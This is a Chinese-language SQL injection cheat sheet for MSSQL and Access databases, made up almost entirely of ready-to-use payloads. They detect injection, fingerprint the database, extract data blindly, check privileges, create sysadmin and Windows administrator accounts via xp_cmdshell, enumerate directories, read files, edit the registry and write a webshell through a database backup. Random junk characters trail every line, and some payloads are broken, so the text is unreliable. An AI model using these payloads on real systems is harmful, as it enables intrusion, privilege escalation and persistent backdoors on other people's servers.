1.判断是否有注入;and 1=1 ;and 1=2 c0Ug5Vr
2.初步判断是否是mssql ;and user>0 ^df wWP
5'lVh/
3.注入参数是字符'and [查询条件] and ''=' K/4@2vF
dzcF15H1
4.搜索时没过滤参数的'and [查询条件] and '%25'=' ;!yK~OBxt
CjdM*#9lW
5.判断数据库系统 r#-
L F?/60
;and (select count(*) from sysobjects)>0 mssql MmJMx
3Vu}D(PJ
;and (select count(*) from msysobjects)>0 access ];.5*a%*
3 s\UU2yr
]0i[=
Vjs2Yenx
6.猜数据库 ;and (select Count(*) from [数据库名])>0 %<i sdvF
b:1B
>
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 2%/F`_XbP
O:]']' /
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 1N/4W6
? Fqh
i
9.(1)猜字段的ascii值(access) /%YW[oY{V
f,YORJ
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 v]JET9hY
1$Up7=Dr=
(2)猜字段的ascii值(mssql) A-x^JC=
288mP]a(v_
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 mF
gqM:
zJ`u>:*$
10.测试权限结构(mssql) ,7nu;fOT[
97c0bgI!+
=B&|\2`{)
s'O%@/;J
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ft"-
l,n_G/\
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- Vmz#u1gGT6
DLwlA!z
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- piIZ*@'
t/i*.>7
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ?!ap@)9
tbQY&TO1
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 5{ap
1I;q@g0
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- XRaGV~
F'~r?D
;and 1=(select IS_MEMBER('db_owner'));-- '{`KYKLP+
j)ic7b
Fd8nR9A
d /jx8(0
11.添加mssql和系统的帐户 33`bKKO}
P IG,a~
;exec master.dbo.sp_addlogin username;-- U=v>gNba
;exec master.dbo.sp_password null,username,password;-- -O})Y>=}
$GoS?\G
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- v9T3=
hyxv+m[
;exec master.dbo.xp_cmdshell 'net user username password x]VycS
B"v*[p?
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- i7RK*{
R0M>'V?e
;exec master.dbo.xp_cmdshell 'net user username password /add';-- ^|/<e?~I
HOD?i_
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- pIIp61=$
=K@LEZZ'/<
f}dlQkZ(
Vc\g"1x
12.(1)遍历目录 clDn=k<
:b9#e g
;create table dirs(paths varchar(100), id int) <B%wq>4S
b'(AVA
;insert dirs exec master.dbo.xp_dirtree 'c:\' sta/i?n
s-#@t
;and (select top 1 paths from dirs)>0 MdX4Rp'
yCz"~c
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) y0O(n/
UAjN
dC<%D'L*
h5{//0 y
(2)遍历目录 >MJ%6A>
hMupQDv/I
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- {F_>cyR
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 )t~ad]oM
Tw \@]fw
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 4=MVn
'4{@F~fu
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 3SM'vV0[
A._CCou
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 . (&6gB
+R?E @S
Gb2|e.z
v~RxtTu
13.mssql中的存储过程 u!xgLf'`
4][VK/v+
xp_regenumvalues 注册表根键, 子键 DN9x<%/-
9X[378f+(
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 !yg &zzP*
f$</BND
xp_regread 根键,子键,键值名 :WH{wm|
E.yFCaL
;exec xp_regread 6oKlr,.
iMry0z
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 |
{zka.sJ
`B?+1Gv
xp_regwrite 根键,子键, 值名, 值类型, 值 ym
p*:lH(
Bl)D/
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 7<kr|-
w2$ L;q
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 2C0j.Ib
2SC'Z>A
xp_regdeletevalue 根键,子键,值名 0#c-qy
1`II%mf[
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 i Q3wi
PazWMmI
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 :z?T/9,C
HJr*\%D}1
MPp:EH
(*26aMp
14.mssql的backup创建webshell YTgT2w
q.:a4w J
use model qHrIs-NR
5m;pHgkb
create table cmd(str image); [)IaXa
"6e3Mj\
insert into cmd(str) values (''); 1>_$O|dE
zBrIhL]95
backup database model to disk='c:\l.asp'; tIA)LF
lYS4Q`z$
qq^[(n
u 'ng'j'
15.mssql内置函数 YC{7;=Pf
Vg(p_k45`
;and (select @@version)>0 获得Windows的版本号 |rpMwkR
_ru<1n[4~
;and user_name()='dbo' 判断当前系统的连接用户是不是sa YU87l
M/[9ZgDc
;and (select user_name())>0 爆当前系统的连接用户 xZAg
^')4RU
;and (select db_name())>0 得到当前连接的数据库 HDo=W qG
_#<l -R`
*nM.`7g*[
~9fTs4U
16.简洁的webshell Z,3CMWHg
B^1jd!m
use model _qit$#wK;
{ F0"U=
create table cmd(str image); <^Q`
y
EU5(s*A
insert into cmd(str) values (''); $YBH;^#
ieyqp~+|4$
backup database model to disk='g:\wwwtest\l.asp';